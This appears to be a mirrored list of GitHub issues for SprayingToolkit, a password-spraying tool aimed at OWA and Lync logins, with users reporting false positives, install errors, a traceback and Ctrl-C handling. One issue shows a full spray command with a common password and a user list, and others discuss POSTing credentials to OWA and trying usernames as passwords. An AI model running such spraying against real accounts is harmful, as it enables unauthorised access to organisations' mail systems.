I modified the code to do a post request appending /owa/auth.owa to the mail host url and provided username, password, destination, flags, and forcedownlevel parameter values.

Was I doing it wrong or does this make sense?
I don't see how I could use the tool as it is built to properly spray the https owa instance.

Atomizer is showing valid credentials when actually failing

The message returned by Lync sprayer is invalid in some scenarios where the following message is returned in the SOAP response for the authentication request:

AADSTS50034: The user account Microsoft.AzureAD.Telemetry.Diagnostics.PII does not exist in the <domain> directory. To sign into this application, the account must be added to the directory.

The tool actually prints "Found credentials:... " in that case.

failed pip install -r requirement

https://pastebin.com/HhN2hPFA

atomizer feature user as a pass.

Hi mate,

Thanks for such a huge contribution as always! I've been thinking implement atomizer to do passwords attempts on $user option.

It's fairly common we get a hit on user:user from time to time.

Is this something you are implementing in near feature ?

Cheers

binascii.Error: Incorrect padding

Just trying this for the first time and I'm getting this error:

python3 atomizer.py owa domain.com Password1 --userfile users.txt --debug
MainThread urllib3.connectionpool: Starting new HTTPS connection (1): autodiscover.domain.com:443
MainThread urllib3.connectionpool: Starting new HTTP connection (1): autodiscover.domain.com:80
MainThread urllib3.connectionpool: http://autodiscover.domain.com:80 "GET /autodiscover/autodiscover.xml HTTP/1.1" 302 0
MainThread urllib3.connectionpool: Starting new HTTPS connection (1): autodiscover-s.outlook.com:443
MainThread urllib3.connectionpool: https://autodiscover-s.outlook.com:443 "GET /autodiscover/autodiscover.xml HTTP/1.1" 401 0
MainThread         owasprayer: [+] Using OWA autodiscover URL: http://autodiscover.domain.com/autodiscover/autodiscover.xml
MainThread urllib3.connectionpool: Starting new HTTPS connection (1): login.microsoftonline.com:443
MainThread urllib3.connectionpool: https://login.microsoftonline.com:443 "GET /domain.com/.well-known/openid-configuration HTTP/1.1" 200 1575
MainThread         owasprayer: [*] OWA domain appears to be hosted on Office365
MainThread urllib3.connectionpool: Starting new HTTP connection (1): autodiscover.domain.com:80
MainThread urllib3.connectionpool: http://autodiscover.domain.com:80 "POST /autodiscover/autodiscover.xml HTTP/1.1" 302 0
MainThread urllib3.connectionpool: Starting new HTTPS connection (1): autodiscover-s.outlook.com:443
MainThread urllib3.connectionpool: https://autodiscover-s.outlook.com:443 "GET /autodiscover/autodiscover.xml HTTP/1.1" 401 0
Traceback (most recent call last):
  File "/root/scripts/SprayingToolkit/core/utils/ntlmdecoder.py", line 219, in ntlmdecode
    st = base64.b64decode(st_raw)
  File "/usr/lib/python3.6/base64.py", line 87, in b64decode
    return binascii.a2b_base64(s)
binascii.Error: Incorrect padding

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "atomizer.py", line 101, in <module>
    atomizer.owa()
  File "atomizer.py", line 64, in owa
    password=self.password,
  File "/root/scripts/SprayingToolkit/core/sprayers/owa.py", line 19, in __init__
    self.recon()
  File "/root/scripts/SprayingToolkit/core/sprayers/owa.py", line 36, in recon
    self.netbios_domain = self.get_owa_domain(self.autodiscover_url)
  File "/root/scripts/SprayingToolkit/core/sprayers/owa.py", line 56, in get_owa_domain
    ntlm_info = ntlmdecode(r.headers["WWW-Authenticate"])
  File "/root/scripts/SprayingToolkit/core/utils/ntlmdecoder.py", line 221, in ntlmdecode
    raise Exception(f"Input is not a valid base64-encoded string: {e}")
Exception: Input is not a valid base64-encoded string: Incorrect padding

Atomizer does not stop even after CTRL-C when using --interval

When running atomizer with the --interval option set, a CTRL-C will not exit the script as expected and the process must be killed another way. A minor inconvenience, but it might be worth patching.

byt3bl33d3r / sprayingtoolkit Goto Github PK

sprayingtoolkit's Introduction

Deprecation Notice

SprayingToolkit

Description

Sponsors

Official Discord Channel

Installation

Tool Overview

Atomizer

Usage

Examples

Vaporizer

Examples

Aerosol

Usage

Spindrift

Usage

Examples

sprayingtoolkit's People

Contributors

Stargazers

Watchers

Forkers

sprayingtoolkit's Issues

What is Rawsec's CyberSecurity Inventory?

Why should you care about being inventoried?

Badges

Want to thank us?

So what?

CSV File

atomizer error

Recommend Projects

Recommend Topics

Recommend Org